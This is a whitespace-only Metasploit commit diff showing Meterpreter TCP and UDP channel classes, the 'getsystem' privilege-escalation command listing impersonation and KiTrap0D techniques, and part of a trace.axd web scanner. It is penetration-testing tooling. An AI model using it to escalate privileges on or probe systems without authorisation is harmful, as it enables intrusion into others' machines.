remove carriage returns
git-svn-id: file:///home/svn/framework3/trunk@9140 4d416f70-5f16-0410-b530-b9f4589650da
parent
e3a1c63e98
commit
a953c47cfb
@ -1,167 +1,167 @@
|
|||
require 'timeout'
|
||||
require 'thread'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/channels/stream'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class TcpServerChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# This is a class variable to store all pending client tcp connections which have not been passed
|
||||
# off via a call to the respective server tcp channels accept method. The dictionary key is the
|
||||
# tcp server channel instance and the values held are an array of pending tcp client channels
|
||||
# connected to the tcp server channel.
|
||||
#
|
||||
@@server_channels = {}
|
||||
|
||||
class << self
|
||||
include Rex::Post::Meterpreter::InboundPacketHandler
|
||||
|
||||
#
|
||||
# This is the request handler which is registerd to the respective meterpreter instance via
|
||||
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
|
||||
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
|
||||
# received and store it in the respective tcp server channels list of new pending client channels.
|
||||
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
|
||||
#
|
||||
def request_handler( client, packet )
|
||||
|
||||
if( packet.method == "tcp_channel_open" )
|
||||
|
||||
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
|
||||
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
|
||||
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
|
||||
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( cid == nil or pid == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
server_channel = client.find_channel( pid )
|
||||
if( server_channel == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
params = Rex::Socket::Parameters.from_hash(
|
||||
{
|
||||
'Proto' => 'tcp',
|
||||
'LocalHost' => localhost,
|
||||
'LocalPort' => localport,
|
||||
'PeerHost' => peerhost,
|
||||
'PeerPort' => peerport,
|
||||
'Comm' => server_channel.client
|
||||
}
|
||||
)
|
||||
|
||||
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
|
||||
|
||||
client_channel.params = params
|
||||
|
||||
if( @@server_channels[server_channel] == nil )
|
||||
@@server_channels[server_channel] = []
|
||||
end
|
||||
|
||||
@@server_channels[server_channel] << client_channel
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
def cls
|
||||
return CHANNEL_CLASS_STREAM
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new tcp server channel on the remote end.
|
||||
#
|
||||
def TcpServerChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# add this instance to the class variables dictionary of tcp server channels
|
||||
@@server_channels[self] = []
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method does not block
|
||||
# and returns nil if no new client connection is available.
|
||||
#
|
||||
def accept_nonblock
|
||||
result = nil
|
||||
if( @@server_channels[self].length > 0 )
|
||||
channel = @@server_channels[self].shift
|
||||
result = channel.lsock
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
|
||||
# if no timeout is specified.
|
||||
#
|
||||
def accept( opts={} )
|
||||
timeout = opts['Timeout'] || -1
|
||||
if( timeout == -1 )
|
||||
result = _accept
|
||||
else
|
||||
begin
|
||||
::Timeout.timeout( timeout ) {
|
||||
result = _accept
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def _accept
|
||||
while( true )
|
||||
if( @@server_channels[self].empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = accept_nonblock
|
||||
break if result != nil
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
||||
require 'timeout'
|
||||
require 'thread'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/channels/stream'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class TcpServerChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# This is a class variable to store all pending client tcp connections which have not been passed
|
||||
# off via a call to the respective server tcp channels accept method. The dictionary key is the
|
||||
# tcp server channel instance and the values held are an array of pending tcp client channels
|
||||
# connected to the tcp server channel.
|
||||
#
|
||||
@@server_channels = {}
|
||||
|
||||
class << self
|
||||
include Rex::Post::Meterpreter::InboundPacketHandler
|
||||
|
||||
#
|
||||
# This is the request handler which is registerd to the respective meterpreter instance via
|
||||
# Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter
|
||||
# for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request
|
||||
# received and store it in the respective tcp server channels list of new pending client channels.
|
||||
# These new tcp client channels are passed off via a call the the tcp server channels accept() method.
|
||||
#
|
||||
def request_handler( client, packet )
|
||||
|
||||
if( packet.method == "tcp_channel_open" )
|
||||
|
||||
cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID )
|
||||
pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID )
|
||||
localhost = packet.get_tlv_value( TLV_TYPE_LOCAL_HOST )
|
||||
localport = packet.get_tlv_value( TLV_TYPE_LOCAL_PORT )
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( cid == nil or pid == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
server_channel = client.find_channel( pid )
|
||||
if( server_channel == nil )
|
||||
return false
|
||||
end
|
||||
|
||||
params = Rex::Socket::Parameters.from_hash(
|
||||
{
|
||||
'Proto' => 'tcp',
|
||||
'LocalHost' => localhost,
|
||||
'LocalPort' => localport,
|
||||
'PeerHost' => peerhost,
|
||||
'PeerPort' => peerport,
|
||||
'Comm' => server_channel.client
|
||||
}
|
||||
)
|
||||
|
||||
client_channel = TcpClientChannel.new( client, cid, TcpClientChannel, CHANNEL_FLAG_SYNCHRONOUS )
|
||||
|
||||
client_channel.params = params
|
||||
|
||||
if( @@server_channels[server_channel] == nil )
|
||||
@@server_channels[server_channel] = []
|
||||
end
|
||||
|
||||
@@server_channels[server_channel] << client_channel
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
def cls
|
||||
return CHANNEL_CLASS_STREAM
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new tcp server channel on the remote end.
|
||||
#
|
||||
def TcpServerChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_tcp_server', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# add this instance to the class variables dictionary of tcp server channels
|
||||
@@server_channels[self] = []
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method does not block
|
||||
# and returns nil if no new client connection is available.
|
||||
#
|
||||
def accept_nonblock
|
||||
result = nil
|
||||
if( @@server_channels[self].length > 0 )
|
||||
channel = @@server_channels[self].shift
|
||||
result = channel.lsock
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Accept a new tcp client connection form this tcp server channel. This method will block indefinatly
|
||||
# if no timeout is specified.
|
||||
#
|
||||
def accept( opts={} )
|
||||
timeout = opts['Timeout'] || -1
|
||||
if( timeout == -1 )
|
||||
result = _accept
|
||||
else
|
||||
begin
|
||||
::Timeout.timeout( timeout ) {
|
||||
result = _accept
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
def _accept
|
||||
while( true )
|
||||
if( @@server_channels[self].empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = accept_nonblock
|
||||
break if result != nil
|
||||
end
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
||||
|
|
|
@ -1,192 +1,192 @@
|
|||
require 'timeout'
|
||||
require 'rex/sync/thread_safe'
|
||||
require 'rex/socket/udp'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class UdpChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
|
||||
#
|
||||
include Rex::Socket::Udp
|
||||
|
||||
#
|
||||
# We are a datagram channel.
|
||||
#
|
||||
class << self
|
||||
def cls
|
||||
return CHANNEL_CLASS_DATAGRAM
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
|
||||
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
|
||||
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
|
||||
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
|
||||
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
|
||||
#
|
||||
def UdpChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => params.peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => params.peerport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# the instance variable that holds all incoming datagrams.
|
||||
@datagrams = []
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
|
||||
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
|
||||
#
|
||||
def timed_read( length=65535, timeout=def_read_timeout )
|
||||
result = ''
|
||||
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = self.read( length )
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = ''
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
|
||||
# datagrams which the remote end of this channel has received and are in the
|
||||
# queue.
|
||||
#
|
||||
def recvfrom( length=65535, timeout=def_read_timeout )
|
||||
result = nil
|
||||
# force a timeout on the wait for an incoming datagram
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
# wait untill we have at least one datagram in the queue
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
# grab the oldest datagram we have received...
|
||||
result = @datagrams.shift
|
||||
# break as we have a result...
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
# if no result return nothing
|
||||
if( result == nil )
|
||||
return [ '', nil, nil ]
|
||||
end
|
||||
# get the data from this datagram
|
||||
data = result[0]
|
||||
# if its only a partial read of this datagram, slice it, loosing the remainder.
|
||||
result[0] = data[0,length-1] if data.length > length
|
||||
# return the result in the form [ data, host, port ]
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level sysread to read data off our datagram queue. Calls
|
||||
# to read() will end up calling this.
|
||||
#
|
||||
def sysread( length )
|
||||
result = self.recvfrom( length )
|
||||
return result[0]
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level syswrite to write data to the remote end of the channel.
|
||||
# Calls to write() will end up calling this.
|
||||
#
|
||||
def syswrite( buf )
|
||||
return _write( buf )
|
||||
end
|
||||
|
||||
#
|
||||
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
|
||||
# remote peer host/port via the remote end of the channel.
|
||||
#
|
||||
def send( buf, flags, saddr )
|
||||
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
|
||||
|
||||
addends = [
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => peerport
|
||||
}
|
||||
]
|
||||
|
||||
return _write( buf, buf.length, addends )
|
||||
end
|
||||
|
||||
#
|
||||
# The channels direct io write handler for any incoming data from the remote end
|
||||
# of the channel. We extract the data and peer host/port, and save this to a queue
|
||||
# of incoming datagrams which are passed out via calls to self.recvfrom()
|
||||
#
|
||||
def dio_write_handler( packet, data )
|
||||
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( peerhost and peerport )
|
||||
@datagrams << [ data, peerhost, peerport ]
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
require 'timeout'
|
||||
require 'rex/sync/thread_safe'
|
||||
require 'rex/socket/udp'
|
||||
require 'rex/socket/parameters'
|
||||
require 'rex/post/meterpreter/extensions/stdapi/tlv'
|
||||
require 'rex/post/meterpreter/channel'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Extensions
|
||||
module Stdapi
|
||||
module Net
|
||||
module SocketSubsystem
|
||||
|
||||
class UdpChannel < Rex::Post::Meterpreter::Channel
|
||||
|
||||
#
|
||||
# We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket.
|
||||
#
|
||||
include Rex::Socket::Udp
|
||||
|
||||
#
|
||||
# We are a datagram channel.
|
||||
#
|
||||
class << self
|
||||
def cls
|
||||
return CHANNEL_CLASS_DATAGRAM
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Open a new UDP channel on the remote end. The local host/port are optional, if none are specified
|
||||
# the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also
|
||||
# optional, if specified all default send(), write() call will sendto the specified peer. If no peer
|
||||
# host/port is specified you must use sendto() and specify the remote peer you wish to send to. This
|
||||
# effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease.
|
||||
#
|
||||
def UdpChannel.open(client, params)
|
||||
c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS,
|
||||
[
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_HOST,
|
||||
'value' => params.localhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_LOCAL_PORT,
|
||||
'value' => params.localport
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => params.peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => params.peerport
|
||||
}
|
||||
] )
|
||||
c.params = params
|
||||
c
|
||||
end
|
||||
|
||||
#
|
||||
# Simply initilize this instance.
|
||||
#
|
||||
def initialize(client, cid, type, flags)
|
||||
super(client, cid, type, flags)
|
||||
# the instance variable that holds all incoming datagrams.
|
||||
@datagrams = []
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select
|
||||
# which wont be of use as we are not a natively backed ::Socket or ::IO instance.
|
||||
#
|
||||
def timed_read( length=65535, timeout=def_read_timeout )
|
||||
result = ''
|
||||
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
result = self.read( length )
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = ''
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the
|
||||
# datagrams which the remote end of this channel has received and are in the
|
||||
# queue.
|
||||
#
|
||||
def recvfrom( length=65535, timeout=def_read_timeout )
|
||||
result = nil
|
||||
# force a timeout on the wait for an incoming datagram
|
||||
begin
|
||||
Timeout.timeout( timeout ) {
|
||||
while( true )
|
||||
# wait untill we have at least one datagram in the queue
|
||||
if( @datagrams.empty? )
|
||||
Rex::ThreadSafe.sleep( 0.2 )
|
||||
next
|
||||
end
|
||||
# grab the oldest datagram we have received...
|
||||
result = @datagrams.shift
|
||||
# break as we have a result...
|
||||
break
|
||||
end
|
||||
}
|
||||
rescue Timeout::Error
|
||||
result = nil
|
||||
end
|
||||
# if no result return nothing
|
||||
if( result == nil )
|
||||
return [ '', nil, nil ]
|
||||
end
|
||||
# get the data from this datagram
|
||||
data = result[0]
|
||||
# if its only a partial read of this datagram, slice it, loosing the remainder.
|
||||
result[0] = data[0,length-1] if data.length > length
|
||||
# return the result in the form [ data, host, port ]
|
||||
return result
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level sysread to read data off our datagram queue. Calls
|
||||
# to read() will end up calling this.
|
||||
#
|
||||
def sysread( length )
|
||||
result = self.recvfrom( length )
|
||||
return result[0]
|
||||
end
|
||||
|
||||
#
|
||||
# Overwrite the low level syswrite to write data to the remote end of the channel.
|
||||
# Calls to write() will end up calling this.
|
||||
#
|
||||
def syswrite( buf )
|
||||
return _write( buf )
|
||||
end
|
||||
|
||||
#
|
||||
# This function is called by Rex::Socket::Udp.sendto and writes data to a specified
|
||||
# remote peer host/port via the remote end of the channel.
|
||||
#
|
||||
def send( buf, flags, saddr )
|
||||
af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr )
|
||||
|
||||
addends = [
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_HOST,
|
||||
'value' => peerhost
|
||||
},
|
||||
{
|
||||
'type' => TLV_TYPE_PEER_PORT,
|
||||
'value' => peerport
|
||||
}
|
||||
]
|
||||
|
||||
return _write( buf, buf.length, addends )
|
||||
end
|
||||
|
||||
#
|
||||
# The channels direct io write handler for any incoming data from the remote end
|
||||
# of the channel. We extract the data and peer host/port, and save this to a queue
|
||||
# of incoming datagrams which are passed out via calls to self.recvfrom()
|
||||
#
|
||||
def dio_write_handler( packet, data )
|
||||
|
||||
peerhost = packet.get_tlv_value( TLV_TYPE_PEER_HOST )
|
||||
peerport = packet.get_tlv_value( TLV_TYPE_PEER_PORT )
|
||||
|
||||
if( peerhost and peerport )
|
||||
@datagrams << [ data, peerhost, peerport ]
|
||||
return true
|
||||
end
|
||||
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end; end; end; end; end; end; end
|
||||
|
|
|
@ -1,98 +1,98 @@
|
|||
require 'rex/post/meterpreter'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Ui
|
||||
|
||||
###
|
||||
#
|
||||
# The local privilege escalation portion of the extension.
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
Klass = Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
include Console::CommandDispatcher
|
||||
|
||||
ELEVATE_TECHNIQUE_NONE = -1
|
||||
ELEVATE_TECHNIQUE_ANY = 0
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
|
||||
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
|
||||
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
|
||||
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
|
||||
"Service - Named Pipe Impersonation (In Memory/Admin)",
|
||||
"Service - Named Pipe Impersonation (Dropper/Admin)",
|
||||
"Service - Token Duplication (In Memory/Admin)",
|
||||
"Exploit - KiTrap0D (In Memory/User)"
|
||||
]
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
{
|
||||
"getsystem" => "Attempt to elevate your privilege to that of local system."
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Name for this dispatcher.
|
||||
#
|
||||
def name
|
||||
"Priv: Elevate"
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Attempt to elevate the meterpreter to that of local system.
|
||||
#
|
||||
def cmd_getsystem( *args )
|
||||
|
||||
technique = ELEVATE_TECHNIQUE_ANY
|
||||
|
||||
desc = ""
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
|
||||
|
||||
getsystem_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help Banner." ],
|
||||
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
|
||||
)
|
||||
|
||||
getsystem_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when "-h"
|
||||
print_line( "Usage: getsystem [options]\n" )
|
||||
print_line( "Attempt to elevate your privilege to that of local system." )
|
||||
print_line( getsystem_opts.usage )
|
||||
return
|
||||
when "-t"
|
||||
technique = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
|
||||
print_error( "Technique '#{technique}' is out of range." );
|
||||
return false;
|
||||
end
|
||||
|
||||
result = client.priv.getsystem( technique )
|
||||
|
||||
# got system?
|
||||
if result[0]
|
||||
print_line( "...got system (via technique #{result[1]})." );
|
||||
else
|
||||
print_line( "...failed to get system." );
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
require 'rex/post/meterpreter'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module Meterpreter
|
||||
module Ui
|
||||
|
||||
###
|
||||
#
|
||||
# The local privilege escalation portion of the extension.
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
Klass = Console::CommandDispatcher::Priv::Elevate
|
||||
|
||||
include Console::CommandDispatcher
|
||||
|
||||
ELEVATE_TECHNIQUE_NONE = -1
|
||||
ELEVATE_TECHNIQUE_ANY = 0
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE = 1
|
||||
ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 = 2
|
||||
ELEVATE_TECHNIQUE_SERVICE_TOKENDUP = 3
|
||||
ELEVATE_TECHNIQUE_VULN_KITRAP0D = 4
|
||||
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION = [ "All techniques available",
|
||||
"Service - Named Pipe Impersonation (In Memory/Admin)",
|
||||
"Service - Named Pipe Impersonation (Dropper/Admin)",
|
||||
"Service - Token Duplication (In Memory/Admin)",
|
||||
"Exploit - KiTrap0D (In Memory/User)"
|
||||
]
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
{
|
||||
"getsystem" => "Attempt to elevate your privilege to that of local system."
|
||||
}
|
||||
end
|
||||
|
||||
#
|
||||
# Name for this dispatcher.
|
||||
#
|
||||
def name
|
||||
"Priv: Elevate"
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Attempt to elevate the meterpreter to that of local system.
|
||||
#
|
||||
def cmd_getsystem( *args )
|
||||
|
||||
technique = ELEVATE_TECHNIQUE_ANY
|
||||
|
||||
desc = ""
|
||||
ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
|
||||
|
||||
getsystem_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help Banner." ],
|
||||
"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
|
||||
)
|
||||
|
||||
getsystem_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when "-h"
|
||||
print_line( "Usage: getsystem [options]\n" )
|
||||
print_line( "Attempt to elevate your privilege to that of local system." )
|
||||
print_line( getsystem_opts.usage )
|
||||
return
|
||||
when "-t"
|
||||
technique = val.to_i
|
||||
end
|
||||
}
|
||||
|
||||
if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
|
||||
print_error( "Technique '#{technique}' is out of range." );
|
||||
return false;
|
||||
end
|
||||
|
||||
result = client.priv.getsystem( technique )
|
||||
|
||||
# got system?
|
||||
if result[0]
|
||||
print_line( "...got system (via technique #{result[1]})." );
|
||||
else
|
||||
print_line( "...failed to get system." );
|
||||
end
|
||||
|
||||
return result
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,121 +1,121 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Exploit mixins should be called first
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::WMAPScanDir
|
||||
# Scanner mixin should be near last
|
||||
include Msf::Auxiliary::Scanner
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'HTTP trace.axd Content Scanner',
|
||||
'Version' => '$Revision: 7605 $',
|
||||
'Description' => 'Detect trace.axd files and analize its content',
|
||||
'Author' => ['c4an'],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
||||
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
tpath = datastore['PATH']
|
||||
if tpath[-1,1] != '/'
|
||||
tpath += '/'
|
||||
end
|
||||
|
||||
begin
|
||||
turl = tpath+'trace.axd'
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
||||
|
||||
|
||||
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
||||
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
|
||||
|
||||
report_note(
|
||||
:host => target_host,
|
||||
:proto => 'HTTP',
|
||||
:port => rport,
|
||||
:type => 'TRACE_AXD',
|
||||
:data => "trace.axd"
|
||||
)
|
||||
|
||||
if datastore['TRACE_DETAILS']
|
||||
|
||||
aregex = /Trace.axd\?id=\d/
|
||||
result = res.body.scan(aregex).uniq
|
||||
|
||||
result.each do |u|
|
||||
turl = tpath+u.to_s
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => turl,
|
||||
'method' => 'GET',
|
||||
'version' => '1.0',
|
||||
}, 10)
|
